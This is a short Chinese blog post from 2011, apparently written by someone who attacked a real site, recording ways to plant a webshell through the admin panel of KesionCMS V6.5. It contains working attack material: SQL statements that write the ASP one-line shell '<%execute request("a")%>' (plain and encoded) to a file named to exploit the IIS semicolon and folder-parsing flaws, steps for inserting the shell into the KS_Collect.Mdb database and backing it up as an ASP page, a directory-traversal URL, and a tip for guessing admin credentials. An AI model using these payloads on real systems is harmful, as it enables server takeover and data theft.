KesionCMS V6.5後台拿SHELL方法

標籤：

Title:KesionCMS V6.5後台拿SHELL方法  --2011-03-29 00:21

最近弄一個網站，是KesionCMS V6.5的WEB系統，試了下後台拿webshell方法,記下來.

1.

建立x.asp使用者再結合IIS的檔案夾解析漏洞，是可以拿到SHELL的，前提是沒有禁止.asp目錄的訪問,我弄的目標站，不允許訪問.asp這樣的目錄下面的檔案的.

2.

後台SQL執行匯出webshell

理論上是可以的，我在本地可以匯出ok.asp;o.xls這樣的檔案的。但是TXT檔案的話，";"會被替換成"_".也就不起作用了。

create table cmd (a varchar(50))

insert into cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾‘)

OR

insert into cmd (a) values (‘<%execute request("a")%>‘)

select * into [a] in ‘d:\wwwroot\a.asp;a.xls‘ ‘excel 8.0;‘ from cmd

匯出去以後，IIS需要重啟一次。WEB才沒有掛掉。但是我第一次匯出的時候，並沒有掛。

匯出去以後同目錄下面還會產生一個INI的檔案。

3.

資料庫插馬，然後備份SHELL

選擇KS_Collect.Mdb資料庫，因為資料量小些，方便。

當然也可以把主要資料庫的NOTDOWN裡面的資料UPDATA成一句話備份。

create table C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))

insert into C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾‘)//此處一點要弄編碼，不要有雜的符號.

然後去備份成ASP頁面的檔案，就可以了，有時候不成功的話，插馬的語句選擇是關鍵。

drop table C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd

系統還有其他地方有安全隱患的地方。

如跨瀏覽目錄http://www.xxx.org/admin/KS.AdminFiles.asp?UploadDir=../..

在後台管理的登入介面，可以猜測管理員帳號,密碼，管理認證碼，都是單獨報錯誤的。

ANSI2Unicode

KesionCMS V6.5後台拿SHELL方法